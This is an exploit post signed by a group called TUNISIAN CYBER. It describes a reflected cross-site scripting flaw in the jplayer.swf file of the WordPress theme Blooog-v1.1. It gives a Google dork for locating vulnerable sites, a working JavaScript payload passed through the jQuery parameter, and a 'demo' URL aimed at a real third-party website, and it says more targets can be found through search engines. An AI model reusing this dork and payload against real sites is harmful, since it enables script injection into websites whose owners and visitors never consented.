X-------------------------------------------------------------X
 _____ _   _ _   _ _____ _____ _____  ___   _   _   _______   _______ ___________ 
|_   _| | | | \ | |_   _/  ___|_   _|/ _ \ | \ | | /  __ \ \ / / ___ \  ___| ___ \
  | | | | | |  \| | | | \ `--.  | | / /_\ \|  \| | | /  \/\ V /| |_/ / |__ | |_/ /
  | | | | | | . ` | | |  `--. \ | | |  _  || . ` | | |     \ / | ___ \  __||    / 
  | | | |_| | |\  |_| |_/\__/ /_| |_| | | || |\  | | \__/\ | | | |_/ / |___| |\ \ 
  \_/  \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/  \____/ \_/ \____/\____/\_| \_|
X-------------------------------------------------------------X                                                                                  
 
 
[+] Author: TUNISIAN CYBER
[+] Exploit Title:  WordPress Blooog-v1.1 Theme Cross Site Scripting
[+] Date: 2-12-2013
[+] Category: WebApp
[+] Google Dork: inurl:"wp-content/themes/Blooog-v1.1"
[+] Tested on: Win7 , ubuntu 13.04
 
 
########################################################################################
P.O.C:
http: //127.0.0.1/wp-content/themes/Blooog-v1.1/assets/js/jplayer.swf

P4yl04D:
?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day TUNISIAN CYBER/)//

The link will be like this:

http: //127.0.0.1/wp-content/themes/Blooog-v1.1/assets/js/jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day TUNISIAN CYBER/)//

 
Demo:(the rest at google,bing..)

http://www.951collegeradio.com/wp-content/themes/Blooog-v1.1/assets/js/jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day%20TUNISIAN%20CYBER/)//

img:http://oi40.tinypic.com/33k6sqq.jpg
########################################################################################